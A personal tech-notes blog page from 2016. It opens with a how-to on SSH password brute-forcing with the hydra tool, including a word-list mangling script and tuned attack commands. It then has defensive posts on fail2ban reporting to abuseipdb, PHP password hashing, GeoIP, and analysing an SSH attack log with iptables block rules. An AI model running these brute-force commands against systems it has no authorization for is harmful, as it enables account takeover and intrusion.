This is intended for educational purposes only!
After researching how to defend our network, I want to share how to do what the attackers are doing. It is very easy to perform automated password attacks against various services. One of their tools is hydra. Chrome marks https://www.thc.org/ with "The site ahead contains harmful programs" and Firefox marks it as "Reported Unwanted Software Page!". Who cares... LOL
To install it
# apt-get install hydra
or
# yum install hydra
To build a dictionary, install the British English word list:
# apt-get install wbritish
or
# yum install words
You don't need to run this as root.
Create a directory (any name you like). I use a directory named hydra.
$ mkdir hydra
$ cd hydra
Now create the word list file before running hydra:
$ cat /usr/share/dict/words > words.txt
To attack SSH with one login and the word list (replace xxx.xxx.xxx.xxx with the target):
$ hydra -l root -P words.txt ssh://xxx.xxx.xxx.xxx
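As an added example (not part of the original post), the script below turns the system dictionary into a leaner password list than a plain copy of /usr/share/dict/words, since that file is mostly capitalised names, possessives and very short words that cost one SSH connection each and almost never hit, and then prints a hydra invocation tuned for sshd. The built-in dictionary stand-in, the target address 192.0.2.10 and the file names words.txt and found.txt are assumptions.

```shell
#!/bin/sh
# Added example, not from the original post: build a leaner password list from
# the system dictionary and print a hydra command that sshd will tolerate.
# The dictionary stand-in, the target address and the file names are assumptions.

# Constructed stand-in for /usr/share/dict/words so the script runs offline.
sample_dict() {
cat <<'EOF'
Aaron
Aaron's
ab
abandon
abandoned
Giraffe
giraffe
Password
zebra
EOF
}

# Drop possessives ("Aaron's"), keep 6..32 character words, fold case, dedupe.
make_wordlist() {
    grep -v "'" | awk 'length($0) >= 6 && length($0) <= 32' \
        | tr 'A-Z' 'a-z' | sort -u
}

# Mangle each word into the variants real passwords tend to be:
# word, word1, word123, word2016, Word.
mangle() {
    awk '{ print $0; print $0 "1"; print $0 "123"; print $0 "2016";
           print toupper(substr($0, 1, 1)) substr($0, 2) }'
}

# Print the hydra command for one target. -t 4 because sshd's MaxStartups
# limit turns more parallel tasks into connection errors rather than speed;
# -e nsr adds the empty password, login-as-password and reversed login;
# -f stops at the first hit and -o records it; -V shows every attempt.
hydra_cmd() {
    printf 'hydra -l root -P words.txt -t 4 -e nsr -f -o found.txt -V ssh://%s\n' "$1"
}

# Demo on the constructed dictionary: 4 surviving words x 5 variants = 20 lines.
sample_dict | make_wordlist | mangle
hydra_cmd 192.0.2.10
```

On a real box the list is built with `make_wordlist < /usr/share/dict/words | mangle > words.txt` and the printed command is then run against a host you own.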
To see all options:
$ hydra -h
Hydra v8.0 (c) 2014 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes.
Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvVd46] [service://server[:PORT][/OPT]]
Options:
-R restore a previous aborted/crashed session
-S perform an SSL connect
-s PORT if the service is on a different default port, define it here
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-x MIN:MAX:CHARSET password bruteforce generation, type "-x -h" to get help
-e nsr try "n" null password, "s" login as pass and/or "r" reversed login
-u loop around users, not passwords (effective! implied with -x)
-C FILE colon separated "login:pass" format, instead of -L/-P options
-M FILE list of servers to attack, one entry per line, ':' to specify port
-o FILE write found login/password pairs to FILE instead of stdout
-f / -F exit when a login/pass pair is found (-M: -f per host, -F global)
-t TASKS run TASKS number of connects in parallel (per host, default: 16)
-w / -W TIME waittime for responses (32s) / between connects per thread
-4 / -6 prefer IPv4 (default) or IPv6 addresses
-v / -V / -d verbose mode / show login+pass for each attempt / debug mode
-q do not print messages about connection erros
-U service module usage details
server the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
service the service to crack (see below for supported protocols)
OPT some service modules support additional input (-U for module help)
Supported services: asterisk cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp redis rexec rlogin rsh s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp
Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPL
v3.0. The newest version is always available at http://www.thc.org/thc-hydra
Don't use in military or secret service organizations, or for illegal purposes.
These services were not compiled in: sapr3 afp ncp oracle.
Use HYDRA_PROXY_HTTP or HYDRA_PROXY - and if needed HYDRA_PROXY_AUTH - environment for a proxy setup.
E.g.: % export HYDRA_PROXY=socks5://127.0.0.1:9150 (or socks4:// or connect://)
% export HYDRA_PROXY_HTTP=http://proxy:8080
% export HYDRA_PROXY_AUTH=user:pass
Examples:
hydra -l user -P passlist.txt ftp://192.168.0.1
hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
hydra -l admin -p password ftp://[192.168.0.0/24]/
hydra -L logins.txt -P pws.txt -M targets.txt ssh
WARNING: FOR EDUCATIONAL PURPOSES ONLY! DO IT ON YOUR OWN LOCAL NETWORK AND AT YOUR OWN RISK. DOING THIS ON A PUBLIC NETWORK IS BREAKING THE LAW!
Dedetok: My Experience Notes. This page contains my experiences using technology. All of the information was working properly at the time it was written. You may use it for any purpose.
Thursday, October 27, 2016
Tuesday, October 25, 2016
fail2ban: auto-reporting attacks to www.abuseipdb.com
Create the file /etc/fail2ban/action.d/abuseipdb.conf with the following content:
# Fail2Ban configuration file
#
# Author: IGAM Muliarsa
#
#
# Action to report IP address to abuseipdb.com
# you must sign up in https://www.abuseipdb.com
# This action requires API_KEY
# https://www.abuseipdb.com/report/json?key=[API_KEY]&category=[CATEGORIES]&comment=[COMMENT]&ip=[IP]
#
# IMPORTANT:
#
# Reporting an IP of abuse is a serious complaint. Make sure that it is
# serious. Fail2ban developers and network owners recommend you only use this
# action for:
# * The recidive where the IP has been banned multiple times
# * Where maxretry has been set quite high, beyond the normal user typing
# password incorrectly.
# * For filters that have a low likelihood of receiving human errors
#
[Definition]
# Option: actionstart
# Notes.: command executed once at the start of Fail2Ban.
# Values: CMD
#
actionstart =
# Option: actionstop
# Notes.: command executed once at the end of Fail2Ban
# Values: CMD
#
actionstop =
# Option: actioncheck
# Notes.: command executed once before each actionban command
# Values: CMD
#
actioncheck =
# Option: actionban
# Notes.: command executed when banning an IP. Take care that the
# command is executed with Fail2Ban user rights.
# Tags: See jail.conf(5) man page
# Values: CMD
#
actionban = curl --data 'key=<apikey>' --data 'category=<category>' --data 'ip=<ip>' --data-urlencode 'comment=<matches>' --user-agent 'fail2ban v0.8.12' 'https://www.abuseipdb.com/report/json'
# Option: actionunban
# Notes.: command executed when unbanning an IP. Take care that the
# command is executed with Fail2Ban user rights.
# Tags: See jail.conf(5) man page
# Values: CMD
#
actionunban =
[Init]
# Option: apikey
# Notes.: your API key from your abuseipdb.com user account
# Values: STRING Default: None
#
apikey = REPLACE_WITH_YOUR_API_KEY
# Option: service
# Notes.: service name you are reporting on, typically aligns with the filter name
# Values: STRING Default: None
#
#service =
Edit /etc/fail2ban/jail.conf (or better, put the override in /etc/fail2ban/jail.local so it survives package upgrades):
...
[sshd]
port = ssh
logpath = %(sshd_log)s
backend = %(sshd_backend)s
enabled = true
filter = sshd
action = iptables-ipset-proto4[]
         mlocaldb[category=10]
         abuseipdb[category=4,18,22]
...
To find the available categories, see the category list in the abuseipdb.com API documentation referenced below.
Restart your fail2ban.
Tested on Fail2ban 0.9.x
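The comment block in the action file above says to report only repeat offenders, yet the jail as written reports every first-time sshd ban. As an added example (not the original post's configuration), the fragment below moves the abuseipdb action onto the stock recidive jail, which watches fail2ban's own log and bans hosts that have already been banned several times. The recidive defaults (logpath, banaction, bantime, findtime, maxretry) are stated as assumed from fail2ban 0.9's jail.conf and should be checked against your copy; mlocaldb is the author's own action from the post.

```ini
# Added example, not from the original post. Assumes the stock recidive jail
# of fail2ban 0.9; check the values below against your own jail.conf.
[sshd]
enabled = true
port    = ssh
logpath = %(sshd_log)s
backend = %(sshd_backend)s
filter  = sshd
action  = iptables-ipset-proto4[]
          mlocaldb[category=10]

[recidive]
enabled   = true
logpath   = /var/log/fail2ban.log
banaction = %(banaction_allports)s
bantime   = 604800   ; 1 week
findtime  = 86400    ; 1 day
maxretry  = 5
action    = %(action_)s
            abuseipdb[category=4,18,22]
```

With this layout a host is reported only after it has been banned by sshd (or any other jail) five times within a day, which is the "recidive" case the action file recommends, and the report then carries the fail2ban.log lines rather than raw sshd lines in the comment.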
References:
- https://www.abuseipdb.com/api.html
Labels:
security
Thursday, October 13, 2016
PHP >= 5.5: password hashing
To hash a password (PASSWORD_DEFAULT is currently bcrypt):
$mypass = "password";
$myhash = password_hash($mypass, PASSWORD_DEFAULT);
To verify a password against the stored hash:
$brutepass = "test";
password_verify($brutepass, $myhash); // returns true or false
Storing the hash in a database: the PHP manual says, "Therefore, it is recommended to store the result in a database column that can expand beyond 60 characters (255 characters would be a good choice)." A bcrypt hash is 60 characters today, but PASSWORD_DEFAULT may switch to a longer algorithm in a future PHP release, so use something like varchar(255).
Reference:
- http://www.php.net/manual/en/faq.passwords.php
- http://id1.php.net/manual/en/book.password.php
Labels:
php
Tuesday, October 11, 2016
PHP 5: GeoIP
Install PHP GeoIP
# apt-get install geoip-bin geoip-database geoip-database-extra php5-geoip php5-geos
Updating the GeoIP database from Debian sid (choose your own mirror):
# wget http://kambing.ui.ac.id/debian/pool/main/g/geoip-database/geoip-database-extra_20160912-1_all.deb
# wget http://kambing.ui.ac.id/debian/pool/main/g/geoip-database/geoip-database_20160912-1_all.deb
# dpkg -i geoip-database_20160912-1_all.deb
# dpkg -i geoip-database-extra_20160912-1_all.deb
To convert an IP to an integer:
$ip = ip2long('119.249.54.66');
To convert the integer back to an IP:
$hostip = long2ip($ip);
To get the three-letter country code:
echo geoip_country_code3_by_name($hostip);
To get the country name:
echo geoip_country_name_by_name($hostip);
To get the country code and region (var_dump() prints directly and returns nothing, so there is no point passing it to echo):
var_dump(geoip_region_by_name($hostip));
echo "<br>";
Error: mod_fcgid: stderr: PHP Warning: geoip_region_by_name(): Required database not available at /usr/share/GeoIP/GeoIPRegion.dat. ??? Maybe it requires a premium subscription ???
Reference:
http://www.php.net/manual/en/book.geoip.php
Labels:
php
China DDOS SSH 2016-10-11 Involving 12 IPs
Log:
Oct 10 21:18:22 mars sshd[11737]: Bad protocol version identification 'test' from 183.129.160.229 port 50149
Oct 10 21:32:00 mars sshd[14650]: Received disconnect from 124.232.156.78: 11: Bye Bye [preauth]
Oct 11 01:28:56 mars sshd[29033]: fatal: no matching cipher found: client aes128-cbc,blowfish-cbc,3des-cbc server aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com [preauth]
Oct 11 03:05:36 mars sshd[16159]: Did not receive identification string from 113.108.21.16
Oct 11 04:40:43 mars sshd[2440]: Received disconnect from 121.18.238.114: 11: [preauth]
Oct 11 04:43:11 mars sshd[2477]: Received disconnect from 119.249.54.75: 11: [preauth]
Oct 11 04:44:12 mars sshd[2482]: Received disconnect from 221.194.47.208: 11: [preauth]
Oct 11 04:45:11 mars sshd[2886]: Received disconnect from 221.194.47.229: 11: [preauth]
Oct 11 04:45:45 mars sshd[3419]: Received disconnect from 221.194.47.224: 11: [preauth]
Oct 11 04:52:32 mars sshd[4427]: Received disconnect from 221.194.47.249: 11: [preauth]
Oct 11 04:53:53 mars sshd[4433]: Received disconnect from 121.18.238.98: 11: [preauth]
Oct 11 04:56:15 mars sshd[5350]: Received disconnect from 119.249.54.68: 11: [preauth]
Oct 11 04:57:21 mars sshd[5384]: Received disconnect from 221.194.47.208: 11: [preauth]
Oct 11 04:57:52 mars sshd[5387]: Received disconnect from 121.18.238.104: 11: [preauth]
Oct 11 04:58:10 mars sshd[5390]: Received disconnect from 221.194.47.229: 11: [preauth]
Oct 11 05:02:36 mars sshd[6364]: Received disconnect from 221.194.47.249: 11: [preauth]
Oct 11 05:08:11 mars sshd[7341]: Received disconnect from 221.194.47.249: 11: [preauth]
Oct 11 05:09:53 mars sshd[7399]: Received disconnect from 119.249.54.68: 11: [preauth]
Oct 11 05:16:53 mars sshd[9285]: Received disconnect from 121.18.238.109: 11: [preauth]
Oct 11 05:18:51 mars sshd[9323]: Received disconnect from 119.249.54.75: 11: [preauth]
Oct 11 05:18:54 mars sshd[9325]: Received disconnect from 121.18.238.114: 11: [preauth]
Oct 11 05:25:45 mars sshd[11293]: Received disconnect from 221.194.47.224: 11: [preauth]
Oct 11 05:26:41 mars sshd[11297]: Received disconnect from 119.249.54.66: 11: [preauth]
Oct 11 05:29:04 mars sshd[11335]: Received disconnect from 221.194.47.229: 11: [preauth]
Oct 11 05:30:10 mars sshd[11717]: Received disconnect from 119.249.54.66: 11: [preauth]
Oct 11 05:31:35 mars sshd[12252]: Received disconnect from 121.18.238.104: 11: [preauth]
Oct 11 05:37:35 mars sshd[13232]: Received disconnect from 221.194.47.229: 11: [preauth]
Oct 11 05:40:48 mars sshd[14251]: Received disconnect from 121.18.238.104: 11: [preauth]
Oct 11 05:47:08 mars sshd[15236]: Received disconnect from 119.249.54.88: 11: [preauth]
Oct 11 05:51:46 mars sshd[16208]: Received disconnect from 121.18.238.104: 11: [preauth]
Oct 11 05:54:15 mars sshd[16266]: Received disconnect from 119.249.54.88: 11: [preauth]
Oct 11 05:57:01 mars sshd[17206]: Received disconnect from 121.18.238.98: 11: [preauth]
Oct 11 06:13:24 mars sshd[20155]: Connection closed by 221.194.47.208 [preauth]
Oct 11 06:16:53 mars sshd[21101]: Received disconnect from 121.18.238.104: 11: [preauth]
Oct 11 06:34:57 mars sshd[24362]: Received disconnect from 121.18.238.114: 11: [preauth]
Oct 11 06:40:53 mars sshd[26291]: Received disconnect from 119.249.54.68: 11: [preauth]
Oct 11 06:41:43 mars sshd[26296]: Received disconnect from 119.249.54.75: 11: [preauth]
Oct 11 06:41:58 mars sshd[26299]: Received disconnect from 221.194.47.249: 11: [preauth]
Oct 11 06:50:14 mars sshd[27709]: Received disconnect from 121.18.238.98: 11: [preauth]
Oct 11 07:55:39 mars sshd[8437]: Received disconnect from 119.249.54.88: 11: [preauth]
Oct 11 08:01:33 mars sshd[9618]: Received disconnect from 221.194.47.208: 11: [preauth]
Oct 11 08:03:14 mars sshd[9627]: Received disconnect from 121.18.238.104: 11: [preauth]
Oct 11 08:04:00 mars sshd[9632]: Received disconnect from 119.249.54.75: 11: [preauth]
Here are the attacker IPs:
- 119.249.54.66
- 119.249.54.68
- 119.249.54.75
- 119.249.54.88
- 121.18.238.104
- 121.18.238.109
- 121.18.238.114
- 121.18.238.98
- 221.194.47.208
- 221.194.47.224
- 221.194.47.229
- 221.194.47.249
Three more addresses appear once each, with a different pre-auth message:
- 113.108.21.16 (Oct 11 03:05:36 mars sshd[16159]: Did not receive identification string from 113.108.21.16)
- 124.232.156.78 (Oct 10 21:32:00 mars sshd[14650]: Received disconnect from 124.232.156.78: 11: Bye Bye [preauth])
- 183.129.160.229 (Oct 10 21:18:22 mars sshd[11737]: Bad protocol version identification 'test' from 183.129.160.229 port 50149)
Timeline of the pre-auth disconnects on 2016-10-11, in order:
No | Time | From | sshd message
1 | 2016-10-11 4:40 | 121.18.238.114 | Received disconnect: 11: [preauth]
2 | 2016-10-11 4:43 | 119.249.54.75 | Received disconnect: 11: [preauth]
3 | 2016-10-11 4:44 | 221.194.47.208 | Received disconnect: 11: [preauth]
4 | 2016-10-11 4:45 | 221.194.47.229 | Received disconnect: 11: [preauth]
5 | 2016-10-11 4:45 | 221.194.47.224 | Received disconnect: 11: [preauth]
6 | 2016-10-11 4:52 | 221.194.47.249 | Received disconnect: 11: [preauth]
7 | 2016-10-11 4:53 | 121.18.238.98 | Received disconnect: 11: [preauth]
8 | 2016-10-11 4:56 | 119.249.54.68 | Received disconnect: 11: [preauth]
9 | 2016-10-11 4:57 | 221.194.47.208 | Received disconnect: 11: [preauth]
10 | 2016-10-11 4:57 | 121.18.238.104 | Received disconnect: 11: [preauth]
11 | 2016-10-11 4:58 | 221.194.47.229 | Received disconnect: 11: [preauth]
12 | 2016-10-11 5:02 | 221.194.47.249 | Received disconnect: 11: [preauth]
13 | 2016-10-11 5:08 | 221.194.47.249 | Received disconnect: 11: [preauth]
14 | 2016-10-11 5:09 | 119.249.54.68 | Received disconnect: 11: [preauth]
15 | 2016-10-11 5:16 | 121.18.238.109 | Received disconnect: 11: [preauth]
16 | 2016-10-11 5:18 | 119.249.54.75 | Received disconnect: 11: [preauth]
17 | 2016-10-11 5:18 | 121.18.238.114 | Received disconnect: 11: [preauth]
18 | 2016-10-11 5:25 | 221.194.47.224 | Received disconnect: 11: [preauth]
19 | 2016-10-11 5:26 | 119.249.54.66 | Received disconnect: 11: [preauth]
20 | 2016-10-11 5:29 | 221.194.47.229 | Received disconnect: 11: [preauth]
21 | 2016-10-11 5:30 | 119.249.54.66 | Received disconnect: 11: [preauth]
22 | 2016-10-11 5:31 | 121.18.238.104 | Received disconnect: 11: [preauth]
23 | 2016-10-11 5:37 | 221.194.47.229 | Received disconnect: 11: [preauth]
24 | 2016-10-11 5:40 | 121.18.238.104 | Received disconnect: 11: [preauth]
25 | 2016-10-11 5:47 | 119.249.54.88 | Received disconnect: 11: [preauth]
26 | 2016-10-11 5:51 | 121.18.238.104 | Received disconnect: 11: [preauth]
27 | 2016-10-11 5:54 | 119.249.54.88 | Received disconnect: 11: [preauth]
28 | 2016-10-11 5:57 | 121.18.238.98 | Received disconnect: 11: [preauth]
29 | 2016-10-11 6:13 | 221.194.47.208 | Connection closed [preauth]
30 | 2016-10-11 6:16 | 121.18.238.104 | Received disconnect: 11: [preauth]
31 | 2016-10-11 6:34 | 121.18.238.114 | Received disconnect: 11: [preauth]
32 | 2016-10-11 6:40 | 119.249.54.68 | Received disconnect: 11: [preauth]
33 | 2016-10-11 6:41 | 119.249.54.75 | Received disconnect: 11: [preauth]
34 | 2016-10-11 6:41 | 221.194.47.249 | Received disconnect: 11: [preauth]
35 | 2016-10-11 6:50 | 121.18.238.98 | Received disconnect: 11: [preauth]
36 | 2016-10-11 7:55 | 119.249.54.88 | Received disconnect: 11: [preauth]
37 | 2016-10-11 8:01 | 221.194.47.208 | Received disconnect: 11: [preauth]
38 | 2016-10-11 8:03 | 121.18.238.104 | Received disconnect: 11: [preauth]
39 | 2016-10-11 8:04 | 119.249.54.75 | Received disconnect: 11: [preauth]
It is better to block those IPs as whole /24 networks. For iptables:
# iptables -A INPUT -p tcp -m tcp --dport 22 -s 119.249.54.0/24 -j DROP
# iptables -A INPUT -p tcp -m tcp --dport 22 -s 121.18.238.0/24 -j DROP
# iptables -A INPUT -p tcp -m tcp --dport 22 -s 221.194.47.0/24 -j DROP
If you have no business with them, just block all incoming connections from them:
# iptables -A INPUT -s 119.249.54.0/24 -j DROP
# iptables -A INPUT -s 121.18.238.0/24 -j DROP
# iptables -A INPUT -s 221.194.47.0/24 -j DROP
Note that -A appends to the end of the INPUT chain, so if an earlier rule already accepts port 22 (or ESTABLISHED traffic) the DROP never matches; use -I INPUT to insert at the top, or place the rules before that ACCEPT. Rules added this way are also lost on reboot unless saved (for example with iptables-save or iptables-persistent).
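The three steps above (read the log, list the offending IPs, block their /24s) can be scripted so they run against the live auth log instead of by hand. The following is an added example, not the author's script: it pulls source addresses out of the four pre-auth message forms seen in this log, counts them per IP and per /24, and prints DROP rules only for networks that hit from at least two distinct hosts, because a single IP in a /24 is not enough evidence to drop the whole block. The sample log is constructed from lines in this post plus one made-up legitimate login (10.0.0.5) that must not be flagged; the threshold of two hosts is an assumption.

```shell
#!/bin/sh
# Added example, not from the original post: extract the sources of sshd
# pre-authentication failures, count them per IP and per /24, and emit
# iptables rules for the networks that hit from several hosts.

# Constructed sample: lines taken from the log in this post plus one
# legitimate login (10.0.0.5, made up) that must not be flagged.
sample_log() {
cat <<'EOF'
Oct 10 21:18:22 mars sshd[11737]: Bad protocol version identification 'test' from 183.129.160.229 port 50149
Oct 11 03:05:36 mars sshd[16159]: Did not receive identification string from 113.108.21.16
Oct 11 04:40:43 mars sshd[2440]: Received disconnect from 121.18.238.114: 11: [preauth]
Oct 11 04:43:11 mars sshd[2477]: Received disconnect from 119.249.54.75: 11: [preauth]
Oct 11 04:44:12 mars sshd[2482]: Received disconnect from 221.194.47.208: 11: [preauth]
Oct 11 04:45:11 mars sshd[2886]: Received disconnect from 221.194.47.229: 11: [preauth]
Oct 11 04:57:52 mars sshd[5387]: Received disconnect from 121.18.238.104: 11: [preauth]
Oct 11 05:18:51 mars sshd[9323]: Received disconnect from 119.249.54.75: 11: [preauth]
Oct 11 06:13:24 mars sshd[20155]: Connection closed by 221.194.47.208 [preauth]
Oct 11 09:00:00 mars sshd[31000]: Accepted publickey for alice from 10.0.0.5 port 51000 ssh2
EOF
}

# One source IP per pre-auth failure line read from stdin. Only the four
# message forms that appear in the post are matched; "Accepted" is not.
preauth_ips() {
    awk '
    /sshd\[[0-9]+\]: (Received disconnect from|Connection closed by|Did not receive identification string from|Bad protocol version identification .* from) [0-9.]+/ {
        for (i = 1; i <= NF; i++) {
            if ($i ~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+:?$/) {
                sub(/:$/, "", $i)      # "1.2.3.4:" -> "1.2.3.4"
                print $i
                break
            }
        }
    }'
}

# Events per IP, busiest first.
count_ips() {
    preauth_ips | sort | uniq -c | sort -rn
}

# /24 networks with at least MIN (default 2) distinct offending hosts.
offending_nets() {
    min=${1:-2}
    preauth_ips | sort -u | awk -F. -v min="$min" '
        { n[$1 "." $2 "." $3 ".0/24"]++ }
        END { for (net in n) if (n[net] >= min) print net }' | sort
}

# iptables rules for those networks. -I (insert at the top of INPUT) rather
# than -A, so an earlier ACCEPT for port 22 cannot match first.
block_rules() {
    offending_nets "$@" | while read -r net; do
        printf 'iptables -I INPUT -s %s -j DROP\n' "$net"
    done
}

sample_log | count_ips
sample_log | block_rules 2
```

Against a real host run it as `preauth_ips < /var/log/auth.log | sort | uniq -c | sort -rn` and `block_rules 2 < /var/log/auth.log`. Keep in mind that "Received disconnect ... [preauth]" is also what a monitoring probe or an aborted ssh-keyscan leaves behind, so review the per-IP counts before piping the rules into a root shell.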
Labels:
security